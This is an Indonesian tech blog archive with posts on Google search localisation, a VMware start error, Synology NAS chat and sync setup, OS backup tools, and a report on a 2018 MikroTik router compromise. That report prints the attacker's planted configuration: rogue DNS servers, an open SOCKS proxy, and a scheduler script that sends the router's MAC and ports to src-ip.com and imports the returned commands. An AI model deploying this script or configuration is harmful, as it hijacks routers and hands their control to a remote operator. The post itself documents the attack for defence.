Arsip Kategori: Software

internet : mesin pencari oh pencari – sang kolektor data

email : ariyaandro@gmail.com

 

Berikut sedikit bahasan tentang dunia mesin pencari di internet khususnya yang semakin selektif menampilkan dan memilih data yang ada betebaran di jagat internet menurut blog ini tentunya ^_^

walau mimin sudah tidak belajar dunia data, setidaknya dengan berbagi cerita bisa lebih asik untuk mengingatnya. dimana bila suatu data diolah dan dikolek secara baik maka hasilnya sepertiberikut.

dalam bulan ini mimin mendengar salah satu mesin pencari yang handal yaitu mbah google semakin pintar-pintar menyuguhkan pencariannya, mulai dari selektif menampilkan barang2 online shop hingga yang akan di ulas berikut ini.

klo mimin lohat sekitar setahunan ini google menampilkan hasil pencarian barang online sangat membantu dan setidaknya mengahsilkan komparasi harga sekaligus walau yang kita cari hanya pengertian barnag tersbut.

1. nama barang muncul online shop nya dulu

kata kunci power bank saja malah suguhan pertamanya online shop… ^_^

lalu klo sedikit di imbuhkan lokasi,

berhubung mimin lagi luar kota, maka hasilnya langsung melihat jejak loe dimana… wow atau trasa terkuntit ^_^

jika hasilnya dari kota lain lagi hasilnya berikut

nah itu hasil percarian di komputer desktop, yang jelas tak ada perangkat GPS nya… nah loh !!!

2. cari judul malah keluar jadwal nontonya juga

disini alesan yang paling memicu mimin ingin bahas mbah, sudah tau weekend pengen nonton dari kemarin. eh tuh hasilnya malah ditunjukin jadwal tayangnya… tersinggung mimin sumpah šŸ˜€

hasil percarian merajuk di jakarta, berikut di surabaya-nya… hmmmm

asikkan hasilnya, tapi jangan tengkar bila hasil google nya temenmu di kota lain tetang sesuatu hal hasilnya beda… dan mungkin yang dimaksud bisa beda pula tar… hihihihihihi !!

3. dicarikan lowongan oleh mbah !!

nah pemanfaatan mesinpencari yang mimin denger sudah sampai sini, bisa langsung komparasi info-info lowongan pekerjaan dari beberapa agent lowker di sekitarmu…

tampilan wilayah jakarta

tampilan wilayah surabaya

sekali lagi gambar-gamabr di atas mimin ambil dari laptop dan komputer beda kota, dengan perlu diamati kata kunci yang mimin gunakan sejak awal yaitu sama saja. namun langsung liat jejak yang cari informasi itu dari mana dan langsung disuguhkan penyesuaian tempatnya.

 


yang ingin lebih mimin ingin sampaikan adalah ini tidak terlepas dari pemanfaatan big data hingga data mining yang sangat sudah variatif. dimana kemungkinan data yang akan dicari oleh pengguna google dengan berbagai hal yang informasi sudah di analis oleh mesin pencari, yang lebih kerennya pasti sedari beberapa tahun yang lalu sebagian mesin pencari sudah melakukan secara AI (kecerdasan buatan) untuk menganalis lebih cepat data yang semakin besar di internet. berikut visulisasi data mining yang di suguhkan dengan cantik,

sebelumnnya mimin juga membahas video itu di postingan terdahulu data mining – clustering

dapat terlihat bahwa data yang sedemikian rupa, bisa disuguhkan dengan baik secara visual manual. untuk hasilnya secara real yaitu seperti mbah google suguhkan… šŸ™‚

sementara itulah yang mimin ingin sampaikan, yang tentunya masih jauh lebih dari cukup. dikarenakan ilmu data di dunia sistem informasi khususnya itu semakain kompleks seiring dengan apa yang ada bagikan di internet dan orang cari di internet. munkin mimin bisa memberi tips urutan belajarnya agar lebih truktural dimana mesin pencari juga belum mampu membuat pencarian yang menyuguhkan keterkaitan suatu ilmu di internet.

mungkin yang bisa anda tahapi yaitu,

  1. excel
  2. database
  3. access
  4. sql
  5. clustering
  6. mining
  7. big data
  8. ai / kecerdasan buatan (bukan buaian loh ya, awas ngantuk) hehehhehe

yang entunya berkaiatan dengan data

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Iklan

Troubleshooting VMware : Tidak bisa start VM (Failed to start the virtual machine (error -18))

email : ariyaandro@gmail.com

berikut ada troubleshooting tiba2 vm tak mau up alias start, dikarenakan ada error. dugaan sementara efek vm nya kena lampu mati (tak ada UPS) atau vmtool nya tak terinstall jadi waktu vm mati di anggap oleh vmware server nya ada masalah power yang berimbas ke vm os…
vm yang bedampak ini pada vm linux, vm windows tak ada maslah up pertama vmware server dinyalakan kembali.

belum sempat cupture, akhirnya cari2 contoh screenshot nya deh… hehehhe

problem yang di terima mimin cuman “Failed to start the virtual machine (error -18)”

setelah beberapa buka link user, langsung menduga pada file yang yantol dan seharusnya tak ada bila suatu vm sudah mati yaitu *.vmx~

solusinya : rename saja (misal .vmx~ jadi .vmx1) atau hapus, dan start vm linux nya akhirnya jalan deh lagi ^_^

contoh file yang masih ada vmx~ nya seperti gambar berikut

link gambar terkait : https://communities.vmware.com/thread/575446

SOLUSI LINK terkait :

https://nerdblurt.com/failed-to-start-the-virtual-machine-error-18/

https://kb.vmware.com/s/article/2108710

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Mikrotik : Wabah Oktober 2018

email : ariyaandro@gmail.com

mimin lagi mimisan sekarang mendapat serangan bertubi-tubi soal bug mikrotik ini. sekali lagi ini bug yang dimanfaatkan menjadi tool lalu dimasifkan ke seluruh mikrotik secara bot. sehingga banyak penyesangan pada router mikrotik hingga beberapa bulan trakhir ini. dari postingan hajime hingga sekarang menemui sekitar 3 macam medode serangan termasuk sekarang.

post yang lalu yaitu :

Mikrotik : Serangan Hajime Botnet ke seluruh mikrotikĀ dunia

Mikrotik : Wabah septemberĀ 2018

berikut capture serangan yang terjadi

ini baru sempat ngoprek config mana saja yang di sasar,.. berikut hasilnya :

/ip firewall connection tracking
set enabled=yes


/ip dns
set servers=199.168.99.27,199.168.99.28


/ip firewall filter
add action=drop chain=input comment="drop ftp brute forcers" dst-port=21 \
protocol=tcp src-address-list=ftp_blacklist
add action=reject chain=output dst-address=139.99.5.202 protocol=tcp
add action=reject chain=output dst-address=95.154.216.166 protocol=tcp
add action=accept chain=input dst-port=6797 protocol=tcp
add action=accept chain=output content="530 Login incorrect" dst-limit=\
1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=ftp_blacklist \
address-list-timeout=3h chain=output content="530 Login incorrect" \
protocol=tcp


/ip service
set telnet disabled=yes
set ftp disabled=yes
set www port=8081
set ssh port=22515
set api disabled=yes
set winbox disabled=yes
set api-ssl disabled=yes
/ip socks
set enabled=yes max-connections=500 port=6797
/ip socks access
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0

ada serangan juga membuat seding mac address WAN seperti berikut

hacked-sending_mac

 

add dont-require-permissions=no name=iDDNS owner=admin policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":global\
\_mac [/interface ethernet get 1 mac-address]\r\
\n:global port ([/ip service get winbox port].\"_\".[/ip socks get port].\
\"_\".[/ip proxy get port])\r\
\n:global info ([/ip socks get enabled].\"_\".[/ip proxy get enabled].\"_\
\".[/interface pptp-server server get enabled])\r\
\n:global cmd \"/\$mac/\$port/\$info/dns\"\r\
\n/tool fetch address=src-ip.com src-path=\$cmd mode=http dst-path=dns;:de\
lay 3s\r\
\n/import dns;:delay 4s;/file remove dns"

dan jika diperhatikan kembali ada user login baru pada PPP yang menyasar password dengan mac address…

coba lakukan update os mikrotik, walau di update nya tidak ada penjelasan spesifik pembenahan bug soal hacked beberapa bulan terakhir ini. jadi disambi closing port atau service yang ada pada router diperlukan. ketika posting ini ada, masih mencapai update os 18 sept 2018 saja

bila ada kesulitan update seperti biasanya, maka perlu di coba format ulang router dengan netinstall. bila resiko netinstall ggal maka router tak akan bisa booting, maka sediakan mikrotik cadangan seperlkunya.

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Backup : hasil coba backup OS dengan Veeam dan Acronis (personal/home) yang free

email : ariyaandro@gmail.com

untuk bahasan backup secara teknis bisa melihat post sebelumnya.

https://pmdkduaonline.wordpress.com/2018/04/24/artian-backup-dari-sisi-infrastruktur-teknis/

berikut penulis mencoba bagaimana hasilnya dan prosesnya untuk salah satu aplikasi backup khusus untuk OS (walau di dalamnya juga ada jenis backup file atau partisi harddisk). apliaksi yang di coba yaitu veeam endpoint (free) dan acronis true image 2018 (trial).

langsung saja disini lebih menjelaskan hasil proses teknisnya, yang menurut penulis ini tidak afektif bila di gunakan waktu OS sedang running. dimana waktunya lebih lama (namun wajar, karena ini os sedang running) dan proses backupnya langsung bisa buffer hingga di atas kapasitas disk yang termakan OS. penulis waktu mencobanya benar2 menguras read-write HDD dan waktunya mungkin bisa seharian.

berikut disk win OS yang ada, kira2 sudah termakan 50’an GB….

drive C akan di backup menggunakan acronis dulu, dimana lebih direkomendasikan backup ke luar HDD local seperti file sharing lainnya atau NAS.

jika diperhatikan sekilas saja pada hasil backupnya, terihat pada size tertentu akan disambung ke file backup lagi dan backup yang terkalkulasi oleh acronis yaitu kisaran 100 GB padahal bisa terlihat bahwa drive widnows nya hanya sedang memankan 50’an GB. sedangkan waktu penulis mencoba acronis yang under Hirren bootabe saja (tentunya saat windows tak aktif) menghasilkan satu file backup full kisaran 27’an GB saja.

kesimpulan berhubung ini punya dukungan dukungan cloud drive acronis tersendiri dan edisi 2018 sudah support malware ransome protect tentu jadi pertimbangan khusus tersendiri bagi yang membutuhkannnya.

 

sedangkan untuk veeam endpoint free ini juga memiliki hasil backup OS windows yang besar pula, masih dalam proses 7% saja sudah menghasilkan size backup 16’an GB. misal hasil sementara itu dikalikan 10x lipat maka menghasilkan 160’an GB, sedangkan drive C yang termiliki berapa apalagi dibandingkan nilai kalkulaksi hasil backup acronis. setting pada aplikasi ini, selalu diminta confing ulang semisal hanya ingin melihat kembali backup yang ada itu diarahkan ke mana (coba click menu configure backup setiap membuka awal apliaksi ini). serta waktu proses backup ke NAS tersebut, mengalami putus dan tentunya pengulangan dilakuakn dari awal proses backupnya.

kesimpulan aplikasi ini masih terlallu besar dibanding proses file backup dari acronis, dan belum mendukung fitur khusus seperti yang diulas pada acronis di atas.

secara keseluruhan, ini lebih efektif waktu backupnya tidak dilakukan di saat aktif menggunakan windows, percobaan di atas telihat bahwa tak ada apliaksi yang sedang dijalankan.

 

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Synologi : Chat – Local Connect


email : ariyaandro@gmail.com

bagi yang membutuhkan jikalau koneksi data dan inet lagi down semua, alternative chat seperti yang di tawarkan oleh Synology berikut mungkin cukup membantuā€¦.

juli 2018__________

ok lanjut nulis atikelnya, sebelumnya akan langsung dibahas kesimpulannya dulu. bila chat ini dipikir seperti whatsapp, maka masih jauh. jadi bagi yang kurang cukup dengan fitur chat synoogy ini harap langsung mencari alternatif lainnya. mungkin kedepannya chat synologi ini akan lebih baik atau hampir seperti WA. yang penulis maksud disini yaitu dalam membuat group chat, semua anggotanya di default bisa hapus group tersebut belum ada penumjukan admin untuk beberapa orang seperti di WA. pembuatan pengguna chat harus add user dahulu ke control panel NAS nya baru bisa digunakan untuk membuka fitur chat.

ok lanjut ke bahasan install chat pada NAS nya…

oh ya sebelumnnya penulis ini melanjut dari setting artikel berikut sebelumnya

https://pmdkduaonline.wordpress.com/2018/06/07/synology-cloud-station-client-ds-cloud-on-android/

https://pmdkduaonline.wordpress.com/2018/06/07/synology-cloud-station-drive-client-on-pc/

https://pmdkduaonline.wordpress.com/2018/05/30/synology-cloud-station-server-on-nas/

jadi install chat synology ini akan ada upgrade di sisi fitur drive dan office synology sebelumnya. hal ini wajar sepertinya, ada sebuah service yang perlu di perbaharui sebelum chat aktif dan service tersebut digunakan bersama dengan beberapa fitur lainnya.

masuk ke packed center dan cari chat, biasanya masuk ke group productivity. lalu install, bila ada peringatan seperti berikut dilanjut saja YES

lanjut akan muncul update fitur drive dan office, click YES untuk melanjut ketahap berikutnya..

bila install chat lancar akan menghasilnya 2 shortcut di daftar fitur NAS

coba buka “Chat admin console” nya dahulu, untuk memastikan kembali setting default chat nya. disini penulis sesuaikan hanya upload max file nya agar tak mudah memenuhi database chat di NAS tentunya.

jika sudah click OK saja untuk save setting nya.

berlanjut ke test fitur chat nya, buka dari daftar shortcut menu NAS. maka hasilnya seperti berikut…

yang penulis perhatikan disini yaitu status user yang aktif, dimana penulis kira seharusnya semua user yang ada ter-create di NAS langsung muncul dengan status off atau belum aktif. ternyata chat ini menstatus user yang aktif bila sudah pernah membuka fitur chat, jadi berhubung user lainnya belum di coba maka di anggap hanya ada 1 user aktif yang sudah coba (kira2nya bgitulah heheheheh).

penulis coba dari komputer lain dengan usercloud dan memulai chat ke admin, baru ada status user aktif 2. ketika usercloud off, maka status ada 1 user aktif dan 1 user off.

bila menjumpai untuk user lainnya fitur chat belum ada di menu shortcut NAS per user, itu dikarenakan belum di default fitur chat untuk setiap user yang ada. maka masuk ke setting user di control center, edit akses aplikasinya dan centang pada fitur apliasi chat user tersbeut. disini penulis mencoba pada user yang lainnya….

berkut tampilan status bila ada user yang aktif…

selebihnya berikut, sekilas tampilan menu saat membuat group chat / group hingga fitur penandaan chat yang bisa di berikan…

untuk aplikasi langsung di desktopnya dan androidnya (synology chat) silahkan dilanjut sendiri… šŸ™‚

sekian selamat meng explore,

 

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Synology : Cloud Station Client (DS-Cloud) on Android


email : ariyaandro@gmail.com

kali ini penulis akan membahas beberapa fitur baru synology NAS yang mungkin sudah agak lama sudah sekitar setahun yang lalu, namun sepertinya perlu dibahas kembali secara teknis agar lebih jelas dalam melakukan step fitur Clud Station dari sinology hingga fitur drive dan office nya synology. dari gambar awal di atas penulis akan lebih membagian gadget.

 

Synology : Cloud Station Server onĀ NAS

 

Download aplikasi DS Cloud untuk android terlebih dahuluā€¦

setelah apliakasi DS cloud terinstall, maka pada halaman muka aplikasi isikan seperti berikut

jika mendapati error seperti berikut waktu click tombil LINK, harap disesuaikan kembali akses koneksi datanya. penulis alami ketika koneksi data untuk aplikasi ini pada smartphone belum di izinkan untuk melakukan koneksi data.

jika DS cloud sudah terkoneksi dengan lancar, akan di suguhkan langsung folder seperti berikut

akan diperintahkan memilih lokasi folder dari NAS yang akan di sikronkan ke folder local hp, jadi double click “Backup-Cloud-Synology” maka muncul folder berikutā€¦

centang folder “usercloud-folder” sesuai yang tersetting sebelumnya, lalu click NEXT. dan berlanjut ke folder local dari hp (sebaiknya siapkan folder baru sendiri untuk menampung file yang di sinkronisasikan ke NAS.

centang folder local hp yang akan di jadikan tempat sikron, lalu click NEXT

lalu akan disuguhkan beberapa pengaturan default

perhatikan tiap pengaturan yang ada, sesuaikan kebutuhan dari sikron hingga ke sub foldernya, besaran file yang akan di sinkronkan (untuk lebih hemat quota data), mode sikronisasinya dua arah atau searah saja dari/ke NAS saja, hingga macam opsi lainnya. pengaturan ini bisa dilanjut belakangan setelah setting awal apliaksi DS cloud selesai

jika mengikuti pengaturan default tinggal click OK saja langsung, dan akan di disuguhkan pengaturan lainnya seperti berikut

dari gambar di atas akan di beri opsi apakah sikron datanya waktu hp nya mode koneksi inet dengan wifi saja atau tidak dan mode sikronnya dilakukan secara background (auto sync) atau tidak.

untuk menyelesaikan tinggal click DONE. dan akan tampil settingan pada apliaksi DS Cloud seperti berikut

akan muncul daftar koneksi folder yang ada pada aplikasi nya. silahkan buka folder cloud nya, maka jika sinkronisasi sudah berjalan dengan lancar dan data berhasil tersinkron dengan baik maka file akan sama dengan apa yang ada di NAS seperti berikut

 

selebihnya silahkan komen, bila ada kurangnya mohon maaf dan selebihnya diusahakan akan direvisi posting ini agar lebih relevan dan tepat sasaranā€¦

salam rekan teknisi seprofesi
__________________________________

link profile teknis penulis

email : ariyaandro@gmail.com

Synology : Cloud Station Drive/Client on PC


email : ariyaandro@gmail.com

kali ini penulis akan membahas beberapa fitur baru synology NAS yang mungkin sudah agak lama sudah sekitar setahun yang lalu, namun sepertinya perlu dibahas kembali secara teknis agar lebih jelas dalam melakukan step fitur Clud Station dari sinology hingga fitur drive dan office nya synology. dari gambar awal di atas penulis akan lebih membahas 3 bagian perangkat yang dibawah yaitu laptop atau PC. yang dimana setup awal sinology station pada NAS sudah dijelaskan dahulu pada link post sebelumnya

Synology : Cloud Station Server onĀ NAS

pertama-tama download lah Synology Cloud Station Drive terlebih dahulu baik dari link langsung dari situs sinology atau dari link yang diperolah dari NAS. penulias menggunakan versi berikutĀ Synology Cloud Station Drive-4.2.6-4408 dalam percobaannya.

Untitled19

gambar di atas cara mendownload langsung dari link menu cloud station server (ini download juga ke link server langsung, bukan dari NAS secara local).

berikut link download aplikasi pendukung untuk client/PC/Laptop, cari seuai perangkat atau untuk synology ini tak terlalu memperhatikan type synology nya dan pada list apliaksi pendukung yang muncul carilah Synology Station Drive.
https://www.synology.com/en-us/support/download

berikut tampilan awal tahap installasinya, click Start Now untuk memulainya

Untitled100

lalu masukkan ID Quick connect yang sudah di setup pada langkah sebelumnya

Untitled101

ijinkan proses SSL yang diminta

Untitled102

jika proses mencari ID Quick Connect lancer maka akan muncul menu untuk menentukan sumbar folder yang akan di sync dengan tujuan folder local komputer

Untitled103

dari gambar di atas sesuaikan sumber folder pada NAS dengan click icon pensil di sebelah kanannnya, lalu tujuan folder lokal pada computer (atau buatlah folder local sendiri terlebih dahulu). bila sudah bias lanjut click tombol DONE.

jika proses awal sikron data computer dengan NAS maka akan muncul info seperti berikut

Untitled104

setelah click OK maka akan langsung disuguhkan aplikasi synology drive seperti berikut

Untitled105

dari intro tutorial sudah mencoba menjelaskan bahwa kurang lebihnya aplikasi synology drive ini seperti google backup (google drive) atau drobox yang sudah mendahului layanan cloud drive.

Untitled105b

layaknya layanan cloud yang lain yang sudah online, synology juga bisa memberikan share terhadap file yang sudah ada dan tersinkronisasi dengan NAS nya.

Untitled105c

layanan sikron bisa di diperhentikan untuk sementara waktu, persis seperti service drobox bagi yang pernah menjalakannnya.

Untitled105d

dari lokasi file tertentu di dalam harddisk computer dapat juga langsung dimasukkan ke NAS dengan cukup click kanan dan akan ada opsi upload ke Synology Cloud Station Drive

berikut akan dimunculkan koneksi computer dengan synology drive yang ada..

Untitled106

dapat diperhatikan pada gamabr di atas bahwa sikronisasi yang terjadi adalah dua arah, dimana bila terjadi edit atau penghapusan atapun upload file akan saling memperbaharui dari dua sisi. untuk setting selebihnya dapat dilakukan edit selanjutnya sesuai kebutuhan sesuai yang ada pada aplikasi pendukung Cloud Station Drive ini.


test proses upload file ke folder CloudSation pada PC/computer akan terlihat pada proses icon tray (klik untuk melihatnya atau klik kanan untuk melihatnya) dari sinology station drive seperti berikut

jika berhasil maka akan tercentang seperti berikutā€¦

untuk lebih memastikan apakah sudah masuk benar ke NAS atau tidak, tinggal akses ke NAS dengan browser login menggunakan user cloud sudah tersettingkan atau sama dengan waktu login dari aplikasi desktop synology cloud station di PC. jika sudah benar sesuai yang di sinkron, coba upload file ke folder tersebut melalui browser tadi maka akan terlihat pula pada PC tadi akan tersinkron file yang ada pula di NAS folder cloud backup seperti berikut hasilnya

dari sini PC masih menggunakan konaksi selokal dengan jaringan NAS, berikut hasil yang dicoba menggunakan koneksi luar (missal koneksi laptop ke tethering / hotspot android, menggunakan jalur koneksi data salah satu provider plat merah). apakah apliaksi Synology cloud station ini masih mampu menditeksi ID Quick connect nya, bila bisa maka koneksi NAS nya sudah berfungsi dengan baik dari koneksi luar.

ternyata hasilnya berhasil mengupload file yang di create pada folder cloudstation nya. ^_^

 

selebihnya silahkan komen, bila ada kurangnya mohon maaf dan selebihnya diusahakan akan direvisi posting ini agar lebih relevan dan tepat sasaranā€¦

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

%d blogger menyukai ini: